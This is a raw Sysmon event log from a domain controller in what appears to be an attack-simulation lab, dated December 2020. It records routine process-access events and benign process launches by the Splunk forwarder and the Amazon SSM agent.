13:53:22.802{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000002023Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002022Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-5100-000000009101}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002021Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8552-5FCF-4300-000000009101}28522816C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-8552-5FCF-5100-000000009101}2508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14ab4|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002020Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.803{10ACEC4A-8552-5FCF-5100-000000009101}2508C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8552-5FCF-4300-000000009101}2852C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000002019Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.802{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000002018Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.801{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002017Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.801{10ACEC4A-8541-5FCF-1000-000000009101}11561220C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+5a1b8|C:\Windows\system32\wbem\wmiprvsd.dll+35a49|C:\Windows\system32\wbem\wmiprvsd.dll+2807f|C:\Windows\system32\wbem\wmiprvsd.dll+29591|C:\Windows\system32\wbem\wmiprvsd.dll+292c2|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2310|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002016Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.794{10ACEC4A-8551-5FCF-3200-000000009101}24723424C:\Windows\system32\DFSRs.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\DFSRs.exe+d839d|C:\Windows\system32\DFSRs.exe+c0dd|C:\Windows\system32\DFSRs.exe+50e1|C:\Windows\system32\DFSRs.exe+72d2|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002015Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.776{10ACEC4A-8552-5FCF-5000-000000009101}29162812C:\Windows\system32\conhost.exe{10ACEC4A-8552-5FCF-4F00-000000009101}3916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002014Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.776{10ACEC4A-8552-5FCF-4C00-000000009101}39884008C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002013Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.771{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-5000-000000009101}2916C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002012Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.769{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002011Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.769{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002010Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.769{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002009Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.769{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002008Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.769{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002007Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.769{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002006Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.769{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002005Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.768{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002004Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.768{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002003Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.768{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8552-5FCF-4F00-000000009101}3916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002002Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.768{10ACEC4A-8551-5FCF-3000-000000009101}15482668C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{10ACEC4A-8552-5FCF-4F00-000000009101}3916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000002001Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.768{10ACEC4A-8552-5FCF-4F00-000000009101}3916C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPEntity | Where-Object { $_.Service -eq 'xenvbd' }" "| Select-Object" DeviceID "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000002000Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.727{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8552-5FCF-4D00-000000009101}3888C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001999Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.727{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8552-5FCF-4D00-000000009101}3888C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001998Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:22.727{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4D00-000000009101}3888C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001997Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 